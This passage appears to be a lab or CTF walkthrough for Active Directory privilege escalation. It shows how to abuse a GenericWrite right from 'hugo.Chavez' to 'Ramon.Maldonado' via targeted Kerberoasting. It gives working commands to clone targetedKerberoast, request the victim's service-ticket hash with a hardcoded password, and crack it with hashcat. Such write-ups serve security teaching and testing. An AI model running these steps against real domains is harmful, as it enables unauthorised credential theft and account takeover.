GenericWrite on User (Hugo -> Ramon)

• As we just set up Hugo.Chavez's password we will now exploit the GenericWrite from hugo.Chavez to Ramon.Maldonado

• This could be abuse with 3 different ways :

  • shadowCredentials (windows server 2016 or +)

  • targetKerberoasting (password should be weak enough to be cracked)

  • logonScript (this need a user connection and to be honest it never worked or unless with a script already inside sysvol)

Target Kerberoasting

• First let’s do a target Kerberoasting, the principle is simple. Add an SPN to the user, ask for a tgs, remove the SPN on the user.

• And now we can crack the TGS just like a classic kerberoasting.

• Shutdown have done a tool which do all the work for you : https://github.com/ShutdownRepo/targetedKerberoast

Install TargetedKerberoast.py

git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py

Get The Hash

python3 targetedKerberoast.py -v -d newyork.local -u hugo.Chavez -p 123456 --request-user Ramon.Maldonado

Crack Hash with RockYou.txt

hashcat -m 13100 -a 0 maldonado.hash rockyou.txt --force